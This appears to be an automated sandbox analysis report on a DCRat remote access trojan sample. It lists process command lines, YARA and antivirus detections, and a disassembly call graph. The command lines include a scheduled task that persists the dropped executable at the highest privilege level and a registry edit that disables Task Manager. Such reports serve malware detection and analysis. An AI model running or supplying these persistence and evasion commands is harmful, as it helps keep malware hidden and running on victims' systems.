                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:15
                                  Start time:02:42:14
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\schtasks.exe
                                  Wow64 process (32bit):false
                                  Commandline:schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 5 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
                                  Imagebase:0x7ff610800000
                                  File size:235'008 bytes
                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:16
                                  Start time:02:42:15
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat"
                                  Imagebase:0x7ff651810000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:17
                                  Start time:02:42:15
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:18
                                  Start time:02:42:15
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\w32tm.exe
                                  Wow64 process (32bit):false
                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Imagebase:0x7ff6141e0000
                                  File size:108'032 bytes
                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:19
                                  Start time:02:42:15
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0x2c0000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.1571279590.0000000002761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.1571279590.000000000279D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 88%, ReversingLabs
                                  Has exited:true

                                  General

                                  Target ID:20
                                  Start time:02:42:15
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0x4d0000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:23
                                  Start time:02:42:20
                                  Start date:27/09/2024
                                  Path:C:\Windows\SysWOW64\reg.exe
                                  Wow64 process (32bit):true
                                  Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                  Imagebase:0xd10000
                                  File size:59'392 bytes
                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:25
                                  Start time:02:42:20
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:26
                                  Start time:02:42:20
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"
                                  Imagebase:0x760000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.1611979914.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:27
                                  Start time:02:42:21
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:28
                                  Start time:02:42:42
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0x580000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:29
                                  Start time:02:42:43
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:30
                                  Start time:02:42:43
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:31
                                  Start time:02:42:54
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0xa60000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.1900712183.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:32
                                  Start time:02:42:55
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:33
                                  Start time:02:42:56
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:36
                                  Start time:02:43:16
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0x9b0000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:37
                                  Start time:02:43:17
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:38
                                  Start time:02:43:18
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:39
                                  Start time:02:43:33
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0x610000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:40
                                  Start time:02:43:34
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:41
                                  Start time:02:43:34
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:42
                                  Start time:02:43:51
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  Imagebase:0xe30000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002A.00000002.2468285261.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  General

                                  Target ID:43
                                  Start time:02:43:52
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:44
                                  Start time:02:43:52
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs"
                                  Imagebase:0x7ff651ec0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:9.8%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:9.3%
                                    Total number of Nodes:1518
                                    Total number of Limit Nodes:37
                                    execution_graph 24916 35be49 103 API calls 4 library calls 24867 35a430 72 API calls 24868 341025 29 API calls pre_c_initialization 23182 349f2f 23183 349f44 23182->23183 23184 349f3d 23182->23184 23185 349f4a GetStdHandle 23183->23185 23189 349f55 23183->23189 23185->23189 23186 349fa9 WriteFile 23186->23189 23187 349f7c WriteFile 23188 349f7a 23187->23188 23187->23189 23188->23187 23188->23189 23189->23184 23189->23186 23189->23187 23189->23188 23191 34a031 23189->23191 23193 346e18 60 API calls 23189->23193 23194 347061 75 API calls 23191->23194 23193->23189 23194->23184 24923 346110 80 API calls 24924 36b710 GetProcessHeap 24925 36a918 27 API calls 3 library calls 24926 35be49 108 API calls 4 library calls 24927 341f05 126 API calls __EH_prolog 23274 35db01 23275 35daaa 23274->23275 23276 35df59 ___delayLoadHelper2@8 19 API calls 23275->23276 23276->23275 23277 35ea00 23278 35ea08 pre_c_initialization 23277->23278 23295 368292 23278->23295 23280 35ea13 pre_c_initialization 23302 35e600 23280->23302 23282 35ea9c 23313 35ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23282->23313 23284 35ea28 __RTC_Initialize 23284->23282 23307 35e7a1 23284->23307 23285 35eaa3 ___scrt_initialize_default_local_stdio_options 23287 35ea41 pre_c_initialization 23287->23282 23288 35ea52 23287->23288 23310 35f15b InitializeSListHead 23288->23310 23290 35ea57 pre_c_initialization ___InternalCxxFrameHandler 23311 35f167 30 API calls 2 library calls 23290->23311 23292 35ea7a pre_c_initialization 23312 368332 38 API calls 3 library calls 23292->23312 23294 35ea85 pre_c_initialization 23296 3682c4 23295->23296 23297 3682a1 23295->23297 23296->23280 23297->23296 23314 36895a 20 API calls __dosmaperr 23297->23314 23299 3682b4 23315 368839 26 API calls ___std_exception_copy 23299->23315 23301 3682bf 23301->23280 23303 35e60e 23302->23303 23306 35e613 ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 23302->23306 23303->23306 23316 35ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23303->23316 23305 35e696 23306->23284 23317 35e766 23307->23317 23310->23290 23311->23292 23312->23294 23313->23285 23314->23299 23315->23301 23316->23305 23318 35e783 23317->23318 23319 35e78a 23317->23319 23323 367f1a 29 API calls __onexit 23318->23323 23324 367f8a 29 API calls __onexit 23319->23324 23322 35e788 23322->23287 23323->23322 23324->23322 23327 35c40e 23328 35c4c7 23327->23328 23335 35c42c _wcschr 23327->23335 23329 35c4e5 23328->23329 23345 35be49 _wcsrchr 23328->23345 23382 35ce22 23328->23382 23332 35ce22 18 API calls 23329->23332 23329->23345 23332->23345 23333 35ca8d 23335->23328 23336 3517ac CompareStringW 23335->23336 23336->23335 23337 35c11d SetWindowTextW 23337->23345 23342 35bf0b SetFileAttributesW 23344 35bfc5 GetFileAttributesW 23342->23344 23355 35bf25 ___scrt_fastfail 23342->23355 23344->23345 23347 35bfd7 DeleteFileW 23344->23347 23345->23333 23345->23337 23345->23342 23348 35c2e7 GetDlgItem SetWindowTextW SendMessageW 23345->23348 23351 35c327 SendMessageW 23345->23351 23356 3517ac CompareStringW 23345->23356 23357 35aa36 23345->23357 23361 359da4 GetCurrentDirectoryW 23345->23361 23366 34a52a 7 API calls 23345->23366 23367 34a4b3 FindClose 23345->23367 23368 35ab9a 76 API calls new 23345->23368 23369 3635de 23345->23369 23347->23345 23349 35bfe8 23347->23349 23348->23345 23363 34400a 23349->23363 23351->23345 23353 35c01d MoveFileW 23353->23345 23354 35c035 MoveFileExW 23353->23354 23354->23345 23355->23344 23355->23345 23362 34b4f7 52 API calls 2 library calls 23355->23362 23356->23345 23358 35aa40 23357->23358 23359 35aaf3 ExpandEnvironmentStringsW 23358->23359 23360 35ab16 23358->23360 23359->23360 23360->23345 23361->23345 23362->23355 23405 343fdd 23363->23405 23366->23345 23367->23345 23368->23345 23370 368606 23369->23370 23371 368613 23370->23371 23372 36861e 23370->23372 23373 368518 __vswprintf_c_l 21 API calls 23371->23373 23374 368626 23372->23374 23380 36862f FindHandlerForForeignException 23372->23380 23378 36861b 23373->23378 23375 3684de _free 20 API calls 23374->23375 23375->23378 23376 368634 23434 36895a 20 API calls __dosmaperr 23376->23434 23377 368659 HeapReAlloc 23377->23378 23377->23380 23378->23345 23380->23376 23380->23377 23435 3671ad 7 API calls 2 library calls 23380->23435 23383 35ce2c ___scrt_fastfail 23382->23383 23384 35cf1b 23383->23384 23390 35d08a 23383->23390 23439 3517ac CompareStringW 23383->23439 23436 34a180 23384->23436 23388 35cf4f ShellExecuteExW 23388->23390 23396 35cf62 23388->23396 23390->23329 23391 35cf47 23391->23388 23392 35cf9b 23441 35d2e6 6 API calls 23392->23441 23393 35cff1 CloseHandle 23394 35cfff 23393->23394 23395 35d00a 23393->23395 23442 3517ac CompareStringW 23394->23442 23395->23390 23401 35d081 ShowWindow 23395->23401 23396->23392 23396->23393 23398 35cf91 ShowWindow 23396->23398 23398->23392 23400 35cfb3 23400->23393 23402 35cfc6 GetExitCodeProcess 23400->23402 23401->23390 23402->23393 23403 35cfd9 23402->23403 23403->23393 23406 343ff4 __vsnwprintf_l 23405->23406 23409 365759 23406->23409 23412 363837 23409->23412 23413 363877 23412->23413 23414 36385f 23412->23414 23413->23414 23415 36387f 23413->23415 23429 36895a 20 API calls __dosmaperr 23414->23429 23417 363dd6 __cftof 38 API calls 23415->23417 23420 36388f 23417->23420 23418 363864 23430 368839 26 API calls ___std_exception_copy 23418->23430 23431 363da1 20 API calls 2 library calls 23420->23431 23421 35ec4a TranslatorGuardHandler 5 API calls 23423 343ffe GetFileAttributesW 23421->23423 23423->23349 23423->23353 23424 363907 23432 364186 51 API calls 3 library calls 23424->23432 23427 36386f 23427->23421 23428 363912 23433 363e59 20 API calls _free 23428->23433 23429->23418 23430->23427 23431->23424 23432->23428 23433->23427 23434->23378 23435->23380 23443 34a194 23436->23443 23439->23384 23440 34b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23440->23391 23441->23400 23442->23395 23451 35e360 23443->23451 23446 34a1b2 23453 34b66c 23446->23453 23447 34a189 23447->23388 23447->23440 23449 34a1c6 23449->23447 23450 34a1ca GetFileAttributesW 23449->23450 23450->23447 23452 34a1a1 GetFileAttributesW 23451->23452 23452->23446 23452->23447 23454 34b679 23453->23454 23462 34b683 23454->23462 23463 34b806 CharUpperW 23454->23463 23456 34b692 23464 34b832 CharUpperW 23456->23464 23458 34b6a1 23459 34b6a5 23458->23459 23460 34b71c GetCurrentDirectoryW 23458->23460 23465 34b806 CharUpperW 23459->23465 23460->23462 23462->23449 23463->23456 23464->23458 23465->23462 24869 35ec0b 28 API calls 2 library calls 24929 35db0b 19 API calls ___delayLoadHelper2@8 24870 341075 82 API calls pre_c_initialization 24871 355c77 121 API calls __vswprintf_c_l 23468 35d573 23469 35d580 23468->23469 23476 34ddd1 23469->23476 23472 34400a _swprintf 51 API calls 23473 35d5a6 SetDlgItemTextW 23472->23473 23479 35ac74 PeekMessageW 23473->23479 23484 34ddff 23476->23484 23480 35ac8f GetMessageW 23479->23480 23481 35acc8 23479->23481 23482 35aca5 IsDialogMessageW 23480->23482 23483 35acb4 TranslateMessage DispatchMessageW 23480->23483 23482->23481 23482->23483 23483->23481 23490 34d28a 23484->23490 23487 34de22 LoadStringW 23488 34ddfc 23487->23488 23489 34de39 LoadStringW 23487->23489 23488->23472 23489->23488 23495 34d1c3 23490->23495 23492 34d2a7 23494 34d2bc 23492->23494 23503 34d2c8 26 API calls 23492->23503 23494->23487 23494->23488 23496 34d1de 23495->23496 23502 34d1d7 _strncpy 23495->23502 23498 34d202 23496->23498 23504 351596 WideCharToMultiByte 23496->23504 23501 34d233 23498->23501 23505 34dd6b 50 API calls __vsnprintf 23498->23505 23506 3658d9 26 API calls 3 library calls 23501->23506 23502->23492 23503->23494 23504->23498 23505->23501 23506->23502 24875 35fc60 51 API calls 2 library calls 24877 363460 RtlUnwind 24878 369c60 71 API calls _free 24879 369e60 31 API calls 2 library calls 24931 359b50 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 24883 368050 8 API calls ___vcrt_uninitialize 24845 35dc5d 24846 35dc2e 24845->24846 24846->24845 24847 35df59 ___delayLoadHelper2@8 19 API calls 24846->24847 24847->24846 24852 349b59 24853 349bd7 24852->24853 24856 349b63 24852->24856 24854 349bad SetFilePointer 24854->24853 24855 349bcd GetLastError 24854->24855 24855->24853 24856->24854 24933 35be49 98 API calls 3 library calls 24885 35ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24886 358c40 GetClientRect 24887 363040 5 API calls 2 library calls 24888 370040 IsProcessorFeaturePresent 24934 35d34e DialogBoxParamW 24935 3679b7 55 API calls _free 24890 3416b0 84 API calls 22918 3690b0 22926 36a56f 22918->22926 22921 3690c4 22923 3690cc 22924 3690d9 22923->22924 22934 3690e0 11 API calls 22923->22934 22935 36a458 22926->22935 22929 36a5ae TlsAlloc 22930 36a59f 22929->22930 22942 35ec4a 22930->22942 22932 3690ba 22932->22921 22933 369029 20 API calls 3 library calls 22932->22933 22933->22923 22934->22921 22936 36a488 22935->22936 22939 36a484 22935->22939 22936->22929 22936->22930 22937 36a4a8 22937->22936 22940 36a4b4 GetProcAddress 22937->22940 22939->22936 22939->22937 22949 36a4f4 22939->22949 22941 36a4c4 __crt_fast_encode_pointer 22940->22941 22941->22936 22943 35ec55 IsProcessorFeaturePresent 22942->22943 22944 35ec53 22942->22944 22946 35f267 22943->22946 22944->22932 22956 35f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22946->22956 22948 35f34a 22948->22932 22950 36a515 LoadLibraryExW 22949->22950 22951 36a50a 22949->22951 22952 36a532 GetLastError 22950->22952 22953 36a54a 22950->22953 22951->22939 22952->22953 22954 36a53d LoadLibraryExW 22952->22954 22953->22951 22955 36a561 FreeLibrary 22953->22955 22954->22953 22955->22951 22956->22948 22957 36a3b0 22958 36a3bb 22957->22958 22960 36a3e4 22958->22960 22962 36a3e0 22958->22962 22963 36a6ca 22958->22963 22970 36a410 DeleteCriticalSection 22960->22970 22964 36a458 _abort 5 API calls 22963->22964 22965 36a6f1 22964->22965 22966 36a70f InitializeCriticalSectionAndSpinCount 22965->22966 22967 36a6fa 22965->22967 22966->22967 22968 35ec4a TranslatorGuardHandler 5 API calls 22967->22968 22969 36a726 22968->22969 22969->22958 22970->22962 24891 361eb0 6 API calls 4 library calls 22972 3676bd 22973 3676cc 22972->22973 22974 3676e8 22972->22974 22973->22974 22975 3676d2 22973->22975 22995 36b290 22974->22995 22999 36895a 20 API calls __dosmaperr 22975->22999 22979 3676d7 23000 368839 26 API calls ___std_exception_copy 22979->23000 22980 367713 23001 3677e1 38 API calls 22980->23001 22982 3676e1 22984 367730 23002 367956 20 API calls 2 library calls 22984->23002 22986 36773d 22987 367746 22986->22987 22988 367752 22986->22988 23003 36895a 20 API calls __dosmaperr 22987->23003 23004 3677e1 38 API calls 22988->23004 22991 3684de _free 20 API calls 22991->22982 22992 367768 22994 36774b 22992->22994 23005 3684de 22992->23005 22994->22991 22996 3676ef GetModuleFileNameA 22995->22996 22997 36b299 22995->22997 22996->22980 23011 36b188 22997->23011 22999->22979 23000->22982 23001->22984 23002->22986 23003->22994 23004->22992 23006 368512 __dosmaperr 23005->23006 23007 3684e9 RtlFreeHeap 23005->23007 23006->22994 23007->23006 23008 3684fe 23007->23008 23176 36895a 20 API calls __dosmaperr 23008->23176 23010 368504 GetLastError 23010->23006 23031 368fa5 GetLastError 23011->23031 23013 36b195 23052 36b2ae 23013->23052 23015 36b19d 23061 36af1b 23015->23061 23018 36b1b4 23018->22996 23021 36b1f7 23023 3684de _free 20 API calls 23021->23023 23023->23018 23025 36b1f2 23085 36895a 20 API calls __dosmaperr 23025->23085 23027 36b23b 23027->23021 23086 36adf1 26 API calls 23027->23086 23028 36b20f 23028->23027 23029 3684de _free 20 API calls 23028->23029 23029->23027 23032 368fc7 23031->23032 23033 368fbb 23031->23033 23088 3685a9 20 API calls 3 library calls 23032->23088 23087 36a61b 11 API calls 2 library calls 23033->23087 23036 368fc1 23036->23032 23038 369010 SetLastError 23036->23038 23037 368fd3 23039 368fdb 23037->23039 23089 36a671 11 API calls 2 library calls 23037->23089 23038->23013 23041 3684de _free 20 API calls 23039->23041 23043 368fe1 23041->23043 23042 368ff0 23042->23039 23044 368ff7 23042->23044 23045 36901c SetLastError 23043->23045 23090 368e16 20 API calls _abort 23044->23090 23091 368566 38 API calls _abort 23045->23091 23048 369002 23050 3684de _free 20 API calls 23048->23050 23051 369009 23050->23051 23051->23038 23051->23045 23053 36b2ba CallCatchBlock 23052->23053 23054 368fa5 _abort 38 API calls 23053->23054 23055 36b2c4 23054->23055 23059 36b348 CallCatchBlock 23055->23059 23060 3684de _free 20 API calls 23055->23060 23092 368566 38 API calls _abort 23055->23092 23093 36a3f1 EnterCriticalSection 23055->23093 23094 36b33f LeaveCriticalSection _abort 23055->23094 23059->23015 23060->23055 23095 363dd6 23061->23095 23064 36af4e 23066 36af65 23064->23066 23067 36af53 GetACP 23064->23067 23065 36af3c GetOEMCP 23065->23066 23066->23018 23068 368518 23066->23068 23067->23066 23069 368556 23068->23069 23073 368526 FindHandlerForForeignException 23068->23073 23106 36895a 20 API calls __dosmaperr 23069->23106 23071 368541 RtlAllocateHeap 23072 368554 23071->23072 23071->23073 23072->23021 23075 36b350 23072->23075 23073->23069 23073->23071 23105 3671ad 7 API calls 2 library calls 23073->23105 23076 36af1b 40 API calls 23075->23076 23078 36b36f 23076->23078 23077 36b376 23079 35ec4a TranslatorGuardHandler 5 API 